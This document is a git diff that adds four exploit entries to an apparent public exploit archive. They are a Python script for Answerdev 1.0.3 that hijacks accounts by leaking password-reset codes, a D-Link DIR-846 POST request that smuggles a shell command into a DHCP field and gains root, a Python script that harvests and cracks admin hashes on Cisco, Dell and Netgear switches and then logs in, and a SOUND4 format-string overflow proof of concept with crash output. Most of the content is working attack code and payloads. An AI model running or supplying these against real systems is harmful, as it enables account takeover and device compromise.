diff --git a/exploits/go/webapps/51257.py b/exploits/go/webapps/51257.py new file mode 100755 index 000000000..646915953 --- /dev/null +++ b/exploits/go/webapps/51257.py @@ -0,0 +1,31 @@ +# Exploit Title: Answerdev 1.0.3 - Account Takeover +# Date: Reported on Jan 24th 2023 +# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp +# Vendor Homepage: https://answer.dev/ +# Software Link: https://github.com/answerdev/answer +# Version: 1.0.3 +# Tested on: Ubuntu 22.04 / Debian 11 +# CVE : CVE-2023-0744 + + +from sys import argv +import urllib3 +from requests import post + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + +def ato(url: list, email: str) -> str: + try: + return f"Your Link: {''.join(url)}users/password-reset?code=" + \ + post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"] + except Exception as err: + return f"Cant reach URL: {err}" + + +if __name__ == "__main__": + if len(argv) != 3: + print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com") + exit() + + print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2]))) \ No newline at end of file diff --git a/exploits/hardware/remote/51243.txt b/exploits/hardware/remote/51243.txt new file mode 100644 index 000000000..00762afa6 --- /dev/null +++ b/exploits/hardware/remote/51243.txt @@ -0,0 +1,87 @@ +# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability +# Google Dork: NA +# Date: 30/01/2023 +# Exploit Author: Françoa Taffarel +# Vendor Homepage: +https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip +# Software Link: +https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip +# Version: DIR846enFW100A53DBR-Retail +# Tested on: D-LINK DIR-846 +# CVE : CVE-2022-46552 + +D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote +command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist +parameter. This vulnerability is exploited via a crafted POST request. + +### Malicious POST Request +``` +POST /HNAP1/ HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 +Firefox/107.0 +Accept: application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings" +HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285 +Content-Length: 171 +Origin: http://192.168.0.1 +Connection: close +Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775 +Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; +PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4 + +{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}} +``` + + +### Response + +``` +HTTP/1.1 200 OK +X-Powered-By: PHP/7.1.9 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-type: text/html; charset=UTF-8 +Connection: close +Date: Thu, 01 Dec 2022 11:03:54 GMT +Server: lighttpd/1.4.35 +Content-Length: 68 + +{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}} +``` + + +### Data from RCE Request + +``` +GET /HNAP1/rce_confirmed HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 +Firefox/107.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; +PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1 +Upgrade-Insecure-Requests: 1 +``` + + +### Response + +``` +HTTP/1.1 200 OK +Content-Type: application/octet-stream +Accept-Ranges: bytes +Content-Length: 24 +Connection: close +Date: Thu, 01 Dec 2022 23:24:28 GMT +Server: lighttpd/1.4.35 + +uid=0(root) gid=0(root) +``` \ No newline at end of file diff --git a/exploits/hardware/remote/51248.py b/exploits/hardware/remote/51248.py new file mode 100755 index 000000000..e1e4b3929 --- /dev/null +++ b/exploits/hardware/remote/51248.py @@ -0,0 +1,107 @@ +# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure +# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US +https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos + + +# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter +# Discovered by Ken 's1ngular1ty' Pyle + + +# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter +# Discovered by Ken 's1ngular1ty' Pyle + + +import requests +import re +import hashlib +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +if len(sys.argv) < 3: + print("Usage: python cve-2019-15993.py URL passwordfile") + sys.exit() + +url = sys.argv[1] +file = sys.argv[2] + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def hash_value(value): + """Calculate the SHA1 hash of a value.""" + sha1 = hashlib.sha1() + sha1.update(value.encode('utf-8')) + return sha1.hexdigest() + +def userName_parser(text, start_delimiter, end_delimiter): + results = [] + iteration = 0 + start = 0 + while start >= 0: + start = text.find(start_delimiter, start) + if start >= 0: + start += len(start_delimiter) + end = text.find(end_delimiter, start) + if end >= 0: + results.append(text[start:end]) + start = end + len(end_delimiter) + + iteration = iteration + 1 + return results + +# retrieve the web page +response = requests.get(url, allow_redirects=False, verify=False) + +# Read in the values from the file +with open(file, 'r') as f: + values = f.readlines() + +values = [value.strip() for value in values] +hashes = {hash_value(value): value for value in values} + +if response.status_code == 302: + print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n") + url = response.headers["Location"] + "config/device/adminusersetting" + response=requests.get(url, verify=False) + + if response.status_code == 200: + print("[*] Successful request to URL:", url + "\n") + content = response.text + users_names = userName_parser(content,"","") + sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content) + + print("SHA1 Hashes found:\n") + + loops = 0 + while loops < len(sha1_hashes): + print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n") + + + for sha1_hash in sha1_hashes: + if sha1_hash in hashes: + print("Match:", sha1_hash, hashes[sha1_hash]) + print("\nTesting Credentials via API.\n\n") + payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash]) + + response_login = requests.get(payload, allow_redirects=False, verify=False) + headers = response_login.headers + if "sessionID" in headers: + print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n") + print(headers["sessionID"]) + else: + print("Unable to sign in.") + loops = loops + 1 + else: + print("Host is not vulnerable:", response.status_code) + + + + + + +[cid:2b37ad37-9b26-416d-b485-c88954c0ab53] + Ken Pyle + M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+ + Main: 267-540-3337 + Direct: 484-498-8340 + Email: kp@cybir.com + Website: www.cybir.com \ No newline at end of file diff --git a/exploits/hardware/remote/51259.txt b/exploits/hardware/remote/51259.txt new file mode 100644 index 000000000..dbe3274a4 --- /dev/null +++ b/exploits/hardware/remote/51259.txt @@ -0,0 +1,330 @@ +# Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow +# Exploit Author: LiquidWorm + + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: 1.1.2 + +Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that +allow users to remotely control SOUND4 processors through a network connection. +SOUND4 offers a tool that manage sending L&S commands to your processors: +the Link&Share Transmitter. + +Desc: The application suffers from a format string memory leak and stack +buffer overflow vulnerability because it fails to properly sanitize user +supplied input when calling the getenv() function from MSVCR120.DLL resulting +in a crash overflowing the memory stack and leaking sensitive information. +The attacker can abuse the username environment variable to trigger and +potentially execute code on the affected system. + +--------------------------------------------------------------------------- +(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) +eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h +--------------------------------------------------------------------------- + +Tested on: Microsoft Windows 10 Home + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5744 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php + + +26.09.2022 + +-- + + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file +02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + +--- + + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe + +(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) +eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h +0:000> kb + # ChildEBP RetAddr Args to Child +00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] +01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] +02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] +03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] +04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] +*** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe +*** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe +05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] +WARNING: Stack unwind information not available. Following frames may be wrong. +06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 +07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f +08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 +09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed +0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 +0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f +0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b +0:000> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +GetUrlPageData2 (WinHttp) failed: 12002. +DUMP_CLASS: 2 +DUMP_QUALIFIER: 0 +FAULTING_IP: +MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] +645046b1 cd29 int 29h + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e) + ExceptionCode: c0000409 (Security check failure or stack buffer overrun) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 00000005 +Subcode: 0x5 FAST_FAIL_INVALID_ARG + +FAULTING_THREAD: 000059e8 +DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG +PROCESS_NAME: LinkAndShareTransmitter.exe +ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. +EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. +EXCEPTION_CODE_STR: c0000409 +EXCEPTION_PARAMETER1: 00000005 +WATSON_BKT_PROCSTAMP: 6144495e +WATSON_BKT_PROCVER: 1.1.0.2 +PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter +WATSON_BKT_MODULE: MSVCR120.dll +WATSON_BKT_MODSTAMP: 577e0f1e +WATSON_BKT_MODOFFSET: a46b1 +WATSON_BKT_MODVER: 12.0.40660.0 +MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013 +BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800) +MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5 +MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20 +NTGLOBALFLAG: 70 +APPLICATION_VERIFIER_FLAGS: 0 +PRODUCT_TYPE: 1 +SUITE_MASK: 784 +DUMP_TYPE: fe +ANALYSIS_SESSION_HOST: LAB17 +ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143 +ANALYSIS_VERSION: 10.0.16299.91 x86fre +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n270] + Type: [FAIL_FAST] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [Unspecified] + Frame: [0] + + ID: [0n257] + Type: [INVALID_ARG] + Class: Addendum + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [Unspecified] + Frame: [0] + +BUGCHECK_STR: FAIL_FAST_INVALID_ARG +PRIMARY_PROBLEM_CLASS: FAIL_FAST +LAST_CONTROL_TRANSFER: from 64504677 to 645046b1 + +STACK_TEXT: +0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe +0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a +0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc +0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 +0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 +0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 +WARNING: Stack unwind information not available. Following frames may be wrong. +0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 +0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f +0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 +0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed +0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 +0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f +0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b + +STACK_COMMAND: ~0s ; .cxr ; kb +THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95 +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f +THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882 + +FOLLOWUP_IP: +MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] +645046b1 cd29 int 29h + +FAULT_INSTR_CODE: 6a5629cd +FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c +FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c +FAULTING_SOURCE_LINE_NUMBER: 132 +SYMBOL_STACK_INDEX: 0 +SYMBOL_NAME: MSVCR120!_invoke_watson+e +FOLLOWUP_NAME: MachineOwner +MODULE_NAME: MSVCR120 +IMAGE_NAME: MSVCR120.dll +DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e +BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e +FAILURE_EXCEPTION_CODE: c0000409 +FAILURE_IMAGE_NAME: MSVCR120.dll +BUCKET_ID_IMAGE_STR: MSVCR120.dll +FAILURE_MODULE_NAME: MSVCR120 